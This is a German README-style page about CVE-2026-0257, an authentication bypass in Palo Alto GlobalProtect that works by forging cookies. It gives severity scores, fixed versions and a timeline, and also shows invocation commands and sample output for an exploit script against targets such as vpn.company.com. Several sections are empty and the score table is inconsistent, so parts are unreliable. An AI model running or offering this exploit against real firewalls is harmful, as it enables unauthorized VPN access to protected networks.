
CVE-2026-0257
PAN-OS: GlobalProtect Authentifizierungsumgehungs-Schwachstellen
Authentifizierungsumgehung im GlobalProtect Portal und Gateway
CVE-2026-0257 ist eine Authentifizierungsumgehungs-Schwachstelle, die die GlobalProtect Portal- und Gateway-Komponenten der PAN-OS-Software von Palo Alto Networks betrifft.
Ein nicht authentifizierter entfernter Angreifer kann Sicherheitsbeschränkungen umgehen und eine nicht autorisierte VPN-Verbindung zu betroffenen Firewalls herstellen.
Hinweis: Panorama und Cloud NGFW sind nicht betroffen.
Vektor (CVSS 4.0 Beispiel):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Authentifizierungsumgehungs-Schwachstellen im GlobalProtect Portal und Gateway der PAN-OS® Software von Palo Alto Networks ermöglichen es dem Angreifer, Sicherheitsbeschränkungen zu umgehen und eine nicht autorisierte VPN-Verbindung herzustellen.
Das Problem resultiert aus CWE-565: Vertrauen auf Cookies ohne Validierung und Integritätsprüfung.
Nicht betroffen:
Diese Schwachstelle erfordert die folgende Konfiguration, um ausnutzbar zu sein:
Hohe Auswirkungen auf Vertraulichkeit und Integrität geschützter Netzwerke.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Behobene Versionen (dringend anwenden):
| PAN-OS Version | Behobene Version |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. |
Prisma Access verfügt ebenfalls über entsprechende behobene Versionen.
Sofortige Workarounds (falls Patchen nicht möglich):
| Datum | Ereignis |
|---|---|
| 2026-05-13 | CVE veröffentlicht + erstes Advisory |
| 2026-05-17 | Ausnutzung in freier Wildbahn beobachtet |
Empfehlung: Patchen Sie sofort — behandeln Sie es als kritisch trotz des Basis-CVSS-Scores aufgrund aktiver Ausnutzung.
Erstellt im README-Stil — 30. Mai 2026
| Metrik | Punktzahl | Bewertung |
|---|
| CVSS v4.0 | 7.8 / 4.7 | Hoch / Mittel |
| CVSS v3.x | Bis zu 9.8 | Kritisch |
| Dringlichkeit | HÖCHSTE | - |
| 2026-05-29 | Palo Alto Update + CISA KEV Ergänzung |
| 2026-05-30 | Dieser Bericht |